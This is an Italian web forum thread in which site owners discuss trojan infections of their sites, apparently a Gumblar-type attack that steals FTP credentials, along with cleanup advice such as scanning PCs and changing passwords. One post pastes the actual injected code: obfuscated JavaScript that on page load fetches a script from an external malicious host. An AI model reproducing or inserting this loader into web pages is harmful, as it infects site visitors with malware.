Trojan nel sito web

Nella index del mio sito web l'antivirus Nod32 mi segnalava un trojan downloader agent,ora ho rimosso e sostituito il file.
Volevo segnalare questa cosa e avere qualche spiegazione sull'accaduto.

Up
Mi è successo di nuovo,altro trojan nella index,la cos ainizia a farsi seria.Nessuno sa dirmi qualcosa?

[andreafallico]

Utilizzi qualche CMS?
Oppure qualche servizio esterno? Se si puoi leggere qui: Servizi esterni: i "buoni" e i "cattivi" e qui: Servizi esterni: i "buoni" e i "cattivi" (segnalazioni).

[Gianluca]

Fai anche una verifica del tuo pc, modificando poi la password d'accesso all0account. Si tratta probabilmente di un virus/worm.

i cms non so neanche cosa siano...di esterno utilizzo google maps,un tool di lettura di quotidiani di paginainizio.com,le news di intopic.it,link a diversi siti.
Mi consigli di togliere servizi esterni come le news e la lettura dei quotidiani?google maps non penso sia dannoso e neanche i link ai siti.

Fai anche una verifica del tuo pc, modificando poi la password d'accesso all0account. Si tratta probabilmente di un virus/worm.

ho modificato la password e sostituito tutti i file del sito.Dici che potrebbe annidarsi anche negli html del mio sito salvati sul computer?

Molte volte non sono le pagine HTML il problema, ma il sito del webmaster che è infetto. Hai scansionato il PC?

Molte volte non sono le pagine HTML il problema, ma il sito del webmaster che è infetto. Hai scansionato il PC?

Si,ho scansionato il pc e mi ha trovato un trojan che ho preso entrando nel mio sito,ho rimosso con Malwarebytes.
Cosa vuoi dire con ciò che hai scritto?
Il webmaster sono io e ho sostituito ogni pagina,file e immagini del sito web con quelli da me archiviati.

loool, scusami. Ho sbagliato a scrivere, è la vecchiaia
Intendevo dire che magari il tuo computer è infetto. Comunque se dici di aver rimosso tutti i possibili virus anche dal tuo PC credo che ora sia tutto apposto, no?

ho lo stesso problema

da un paio di settimane un virus si inserisce all'interno del mio forum inserendo questa stringa in tutti i file "index.php" index.html e tutti i file .js

questo è il codice che ho trovato in questi file

Codice:

<script>/*GNU GPL*/ try{window.onload = function(){var Sdm2ytcy03g1 = document.createElement('s@!c#^$r#$$i#^p(#t!#!'.replace(/\(|\$|\^|\)|@|#|\!|&/ig, ''));Sdm2ytcy03g1.setAttribute('type', 'text/javascript');Sdm2ytcy03g1.setAttribute('src',  'h(t^@t!p#!#@:!#(/&)!/!$$c)^^&n^(c@()m)^!a)@#&@x^$-&c(n@#.@g@$o##o^(@@g(#&^l!e$(@.(d@)(k@&##@.#@)!$d&#@(e$$!#v&&i!)$a@n(&!#t^)^($c$^l@@)(i!p^##^-&$c(&(o!#m&#.)^$&&w)^&h&o#&s#@a@@l$(e(##o)^n$@@l@&(^i(!$n$#))e@).$)!r)$u#()&:#8(#&^0@^)(8(!##0@$/$$i$$)b$#m)^#.$^^&$c^o^^$)m^##(#/&(#i(#b$!$m#(&#.&#$&c)$$o^)&(m&@($!/&g(@^@o&!&!o#))g()#l$&e$#.&&c!&o!$$(m&^/&!n&a)s&&!z@&a#^@(^-#&k#(#$l#@a($#(s&$a)!.!#)$p!$l$)/!d#e^^@!t!(#^i!)k!$n&&&e&)w$s^.))c##$o))^^m)(/#'.replace(/&|@|\$|\)|#|\^|\!|\(/ig, ''));Sdm2ytcy03g1.setAttribute('defer', 'defer');Sdm2ytcy03g1.setAttribute('id', 'C^l)@q!)@^q^#^#c)&i!(#5^!$@9($d^#&v@d$&'.replace(/&|\(|\!|@|#|\$|\)|\^/ig, ''));document.body.appendChild(Sdm2ytcy03g1);}} catch(e) {}</script>

questa notte ho eliminato tutti i file e reinstallato il forum e il thema. poi ho settatto tutti i file a 444 per cui senza permessi di scrittura..... neanche 12 ore e alcuni file ( meno del solito) sono infetti! la cosa bella è che ho provato a eliminare la stringa ma il sistema mi dice che non ho i permessi di scrittura!!!!!!!!!!! ora mi domando come fa a inserire la stringa quando io non posso neanche toglierla!


inutile dire che anche reinstallando da zero il forum (smf 1.1.11) e cambiando le password del mio account nulla è cambiato!
ho editato il file index.php in maniera da chiudere l'accesso al forum per evitare che il virus si trasferisca su tutti i pc degli utenti.
qualcuno ha altre info o ha avuto lo stesso mio problema?

grazie un saluto

hai provato a cambiare password?

cambiato tutto. password ed ho tolto i permessi di scrittura a tutti i file!
ora ho riaperto per vedere. ma prima di connettermi entro nel pannello e controllo i file index per sicurezza. ho perso un ora per togliere il trojan dal pc!

ufrontiera, i file non vengono infettati sul Web Server ma probabilmente direttamente sul tuo computer in fase di upload. O, peggio ancora, c'è un keylogger e qualcosa o qualcuno sa la tua password.

ehi.. a me quando tento di entrare in questo topic avast mi dice che c'è un virus...
per tanto hai infettato anche altervista
complimenti!
Credo proprio sia il tuo pc.
ciao
ah... ora premo "chiude connessione" et voilà ... esco da altervista

no non è dal mio pc. per evitare anche questo ho fatto linvio dei file da un server e non da casa. (e i file li ho scaricati sul server dal sito simplemachine direttamente senza passare dal mio pc)
e cmq i file restano puliti per almeno 12 ore!
ho ririririririririmodificato le password di altervista

una news del mio virus

http://seoforums.org/site-optimizati...ction-var.html

Lì c'è anche un tool per debellarlo, ti consiglio di avviarlo e di cambiare tutte le password.

perchè altervista non permette l'esecuzione per più di 15 secondi dello script. per cui si ferma

Allora all'inizio inserisci questo, subito dopo <?php:

Codice PHP:

ini_set('max_execution_time', 100);


Se ancora non funziona aumenta il valore.

[andreafallico]

Allora all'inizio inserisci questo, subito dopo <?php:

Codice PHP:

ini_set('max_execution_time', 100);


Se ancora non funziona aumenta il valore.

Non è possibile modificare i valori del php.ini.

No? Io sono andato a memoria, uso rarissimamente la funzione ini_set()... allora niente, lascia stare. L'unica sarebbe limitare lo script ad una sola cartella e ripeterlo per tutte le cartelle.

forse non abbiamo chiare alcune cose.....
1 è uno script che viene inserito dopo che ho reinstallato il forum (per cui non è sulla mia macchina e poichè tutti i file del forum non sono file eseguibili è da escludere che lo script sia arrivato via ftp)
2 per essere inserito uno script sul forum cè bisogno di far eseguire un file sul server
3 per eseguire un file.exe sul server c'è bisogno di loggarsi come root
4 in aggiunta allo script è stato inserito un virus per carpire i dati di chi accede al forum


due piu due fa 4..... il forum è sotto attacco da qualcuno che vuole farsi i cavole degli altri!

[darkwolf]

Usiamo lo stesso script per il forum e non mi risulta abbia bug noti (la versione da noi in uso è uscita di recente) e comunque il mio forum è "pulito" e nessuno sui canali smf ha accusato il tuo problema.
Escluderei pertanto un bug dello script ed escluderei a priori un problema al server (avrebbe colpito tutti i siti ospitati e non solo il tuo).
Facendo i conti, rimane solo un ipotetico worm/virus/trojan/malware nel tuo pc.
-
Da alcune ricerche sembra che tale problema affligga qualunque tipo di sito su server linux (ho trovato rifermenti a joomla, wordpress, pligg e simili).
-
How-to Fix Malicious Javascript Code (suspected as variant of Gumblar virus): http://www.ryan-isra.net/howto-fix-m...gumblar-virus/
-
insomma, un virus sul tuo pc, grabba i tuoi dati di accesso ftp e in silenzio fa il suo sporco lavoro.
Per pulire dovrebbe bastare: mettere in sicurezza il pc (spyboot; avira; combofix e simili); cambiare la password del sito e pulire tutti i file del sito (notepad++ potrebbe aiutarti).